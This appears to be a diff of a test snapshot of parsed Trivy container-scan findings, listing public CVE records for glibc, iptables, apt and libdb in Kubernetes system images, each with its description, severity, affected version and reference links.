"https://linux.oracle.com/errata/ELSA-2021-0348.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200327-0003/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, "category": "Vulnerability", - "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-10029", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-10029", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "libapt-pkg6.0", + "references": [ + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", + ], + }, + "category": "Vulnerability", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-27618", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-27618", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - "https://linux.oracle.com/cve/CVE-2020-27618.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210401-0006/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2020-27618", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-27618", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-27618", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2010-4756", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "http://cxib.net/stuff/glob-0day.c", "http://securityreason.com/achievement_securityalert/89", @@ -157256,7 +158065,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ @@ -157302,10 +158111,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2018-20796", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/107160", "https://access.redhat.com/security/cve/CVE-2018-20796", @@ -157319,7 +158128,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ @@ -157365,10 +158174,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010022", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "https://access.redhat.com/security/cve/CVE-2019-1010022", "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", @@ -157381,7 +158190,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: stack guard protection bypass", "references": [ @@ -157423,10 +158232,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010023", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/109167", "https://access.redhat.com/security/cve/CVE-2019-1010023", @@ -157440,7 +158249,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ @@ -157486,10 +158295,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010024", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/109162", "https://access.redhat.com/security/cve/CVE-2019-1010024", @@ -157504,7 +158313,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ @@ -157554,10 +158363,10 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010025", - "installedVersion": "2.28-10", - "packageName": "libc6", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ "https://access.redhat.com/security/cve/CVE-2019-1010025", "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", @@ -157570,1523 +158379,1065 @@ and the severity is therefore considered low.", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19126", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19126", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - "https://linux.oracle.com/cve/CVE-2019-19126.html", - "https://linux.oracle.com/errata/ELSA-2020-3861.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-19126", - ], - }, - "category": "Vulnerability", - "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19126", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19126", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - }, - { - "type": "URL", - "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-27645", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-27645", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - "https://linux.oracle.com/cve/CVE-2021-27645.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - "https://security.gentoo.org/glsa/202107-07", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2021-27645", - ], - }, - "category": "Vulnerability", - "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-27645", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-27645", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-8457", - "installedVersion": "5.3.28+dfsg1-0.5", - "packageName": "libdb5.3", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - "https://access.redhat.com/security/cve/CVE-2019-8457", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://linux.oracle.com/cve/CVE-2019-8457.html", - "https://linux.oracle.com/errata/ELSA-2020-1810.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - "https://security.netapp.com/advisory/ntap-20190606-0002/", - "https://ubuntu.com/security/notices/USN-4004-1", - "https://ubuntu.com/security/notices/USN-4004-2", - "https://ubuntu.com/security/notices/USN-4019-1", - "https://ubuntu.com/security/notices/USN-4019-2", - "https://usn.ubuntu.com/4004-1/", - "https://usn.ubuntu.com/4004-2/", - "https://usn.ubuntu.com/4019-1/", - "https://usn.ubuntu.com/4019-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-8457", - "https://www.oracle.com/security-alerts/cpuapr2020.html", - "https://www.oracle.com/security-alerts/cpujan2020.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", - "https://www.sqlite.org/releaselog/3_28_0.html", - "https://www.sqlite.org/src/info/90acdbfce9c08858", - ], - 